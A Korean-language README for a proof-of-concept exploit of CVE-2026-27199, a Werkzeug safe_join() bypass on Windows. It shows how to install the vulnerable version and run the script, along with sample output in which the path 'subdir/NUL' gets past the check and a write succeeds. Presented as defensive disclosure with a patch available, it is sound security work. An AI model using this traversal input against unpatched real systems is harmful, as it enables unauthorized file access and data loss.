
# CVE-2026-27199 개념 증명 익스플로잇 Werkzeug의 `safe_join()` Windows 장치 이름 우회 취약점으로, 경로 탐색 및 무단 데이터 삭제를 시연합니다.
safe_join() Windows 장치 이름 우회상태: 공개적으로 공개됨. werkzeug 3.1.6에서 수정됨.
심각도: 보통
보고자: @alimezar
권고: GHSA-29vq-49wr-vm6x
| 패키지 | 영향받는 버전 | 패치된 버전 |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
요구 사항: Windows, Python 3.8+,
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (정상적으로 차단됨)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (우회 성공!)
[*] 반환된 경로에 쓰기 시도 중 ...
[!] open(중첩 NUL) write: SUCCESS — 데이터가 장치에 의해 자동으로 폐기됨
[!] 취약함: 이 설치 환경에서 CVE-2026-27199 확인됨.
werkzeug >= 3.1.6으로 업그레이드하여 해결하세요.
[+] safe_join(base, 'subdir/NUL') -> None (정상적으로 차단됨)
[+] 취약하지 않음: 중첩된 장치 이름이 차단되었습니다.
본 PoC는 책임 있는 공개 및 공개 패치 제공 이후 교육 및 방어 목적으로 게시되었습니다.